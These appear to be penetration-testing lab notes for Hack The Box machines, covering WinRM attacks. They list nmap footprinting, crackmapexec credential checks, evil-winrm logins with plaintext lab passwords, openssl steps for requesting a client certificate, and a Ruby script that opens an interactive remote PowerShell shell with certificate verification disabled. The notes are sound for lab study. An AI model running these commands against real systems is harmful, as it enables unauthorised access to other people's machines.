[5985/5986] WinRM


#Footprinting
Intrusionz3r0X@htb[/htb]$ nmap -sV -sC 10.129.201.248 -p5985,5986 --disable-arp-ping -n

#Verify password
Intrusionz3r0X@htb[/htb]$ crackmapexec winrm 10.10.11.222 -u 'ansible' -p 'DevT3st@123'

# Log into WinRM
Intrusionz3r0X@htb[/htb]$ evil-winrm -i 10.129.201.248 -u Cry0l1t3 -p P455w0rD!

Evil-winrm with certificate

Intrusionz3r0X@htb[/htb]$ evil-winrm -S -i 10.10.10.103 -u 'amanda' -p 'Ashare1972' -c certnew.cert -k mykey.key

If you face something like this, you must create a certificate signing request so that the server issues a certificate you can download.

# Generate private key
openssl genrsa -out mykey.key 2048

# Create a certificate signing request (CSR)
openssl req -new -key mykey.key -out request.csr

Copy the request.csr content, paste it into the form and submit. If everything is fine, the server will issue a certificate to use.

require 'winrm'

# Author: Alamot

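# Open a WinRM connection over HTTPS that authenticates with a client
# certificate/key pair. The user/password options are left commented out as in
# the original; the certificate is what authenticates this session.
conn = WinRM::Connection.new(
  endpoint: 'https://10.10.10.103:5986/wsman',
  transport: :ssl,
  client_cert: 'certnew.cer',
  client_key: 'mykey.key',
  # user: 'amanda',
  # password: 'Ashare1972',
  # NOTE(review): with peer verification disabled the server certificate is never
  # checked, so the session is exposed to interception. When the issuing CA is
  # available, supply it via the gem's ca_trust_path option instead of turning the
  # check off.
  no_ssl_peer_verification: true
)

# Most recent line read from stdin; the loop stops once the user types "exit".
command = ''

conn.shell(:powershell) do |shell|
  output = nil
  until command == "exit\n"
    # The prompt is rendered remotely so it shows the remote identity, host and
    # current directory rather than the local ones.
    prompt = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
    print(prompt.output.chomp)
    # gets returns nil at EOF (closed stdin / Ctrl-D). The original passed that nil
    # straight to shell.run and could never satisfy the exit condition, so EOF is
    # treated exactly like typing "exit".
    command = gets || "exit\n"
    # Stream the remote command's stdout/stderr to the matching local streams as
    # the output arrives.
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  # The loop body always runs at least once (command starts empty), so output is set.
  puts "Exiting with code #{output.exitcode}"
end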
